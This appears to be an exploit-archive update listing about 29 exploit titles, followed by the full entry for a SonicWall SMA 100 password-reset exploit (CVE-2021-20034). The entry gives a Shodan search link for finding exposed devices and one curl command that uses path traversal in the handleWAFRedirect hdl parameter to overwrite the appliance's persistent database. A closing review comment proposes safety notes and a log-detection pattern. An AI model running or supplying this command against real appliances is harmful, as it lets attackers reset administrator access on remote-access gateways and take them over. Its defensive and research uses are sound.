
3 changes to exploits/shellcodes

Macro Expert 4.7 - Unquoted Service Path
AssetMan 2.4a - 'download_pdf.php' Remote File Disclosure
PHP-Nuke addon Nuke Mobile Entartainment 1.0 - Local File Inclusion
xKiosk 3.0.1i - 'xkurl.php?PEARPATH' Remote File Inclusion
InstaGuide Weather Script 1.0 - 'index.php' Local File Inclusion
CMSbright - 'id_rub_page' SQL Injection
ParsBlogger - 'blog.asp' SQL Injection
Blog System 1.x - 'note' SQL Injection
PHP Joke Site Software - 'sbjoke_id' SQL Injection
PHP Classifieds ADS - 'sid' Blind SQL Injection
Softbiz Article Directory Script - 'sbiz_id' Blind SQL Injection
Storyteller CMS - 'var' Local File Inclusion
MyPhpAuction 2010 - 'id' SQL Injection
PHP Lowbids - 'viewfaqs.php' Blind SQL Injection
BetMore Site Suite 4 - 'bid' Blind SQL Injection
PHP auctions - 'viewfaqs.php' Blind SQL Injection
PHP Coupon Script 6.0 - 'bus' Blind SQL Injection
PHP Link Directory Software - 'sbcat_id' SQL Injection
PHP Classified ads software - 'cid' Blind SQL Injection
PHP Script Directory Software - 'sbcat_id' SQL Injection
PHP Link Directory Software - 'sbcat_id' SQL Injection
PHP Classified ads software - 'cid' Blind SQL Injection
PHP Script Directory Software - 'sbcat_id' SQL Injection
Weekly Drawing Contest 0.0.1 - 'Check_Vote.php' Local File Inclusion
Holtstraeter Rot 13 - 'Enkrypt.php' Directory Traversal
easyGB 2.1.1 - 'index.php' Local File Inclusion
PHPAuctions - 'viewfaqs.php' SQL Injection
SonicWall SMA 10.2.1.0-17sv - Password Reset
Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation
# Exploit Title: SonicWall SMA 10.2.1.0-17sv - Password Reset
# Description: Overwrite the persistent database, resulting in password reset on reboot.
# Shodan Dork: https://www.shodan.io/search?query=title%3A%22Virtual+Office%22+%22Server%3A+SonicWall%22
# Date: 10/19/2021
# Exploit Author: Jacob Baines (@Junior_Baines)
# Root Cause Analysis: https://attackerkb.com/topics/23t9VCbGzt/cve-2021-20034/rapid7-analysis?referrer=profile
# Vendor Homepage: https://www.sonicwall.com/
# Version: SMA 100 Series using 9.0.0.10-28sv, 10.2.0.7-34sv, and 10.2.1.0-17sv
# Tested on: SMA 500v using 9.0.0.10-28sv and 10.2.1.0-17sv
# CVE : CVE-2021-20034

curl -v --insecure "https://10.0.0.6/cgi-bin/handleWAFRedirect?hdl=../flash/etc/EasyAccess/var/conf/persist.db"
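Review bot: the curl line hard-codes 10.0.0.6 and, per the Description, overwrites the persistent database, yet nothing next to the command says that the address is a lab placeholder or that the request changes state on the appliance. Suggest a comment directly above the command stating both, plus a header line naming the vendor advisory or fixed firmware for CVE-2021-20034, since the header lists affected versions only. The header would also benefit from naming the request shape visible here, a GET to /cgi-bin/handleWAFRedirect whose hdl parameter contains ../, as the pattern to look for in web logs.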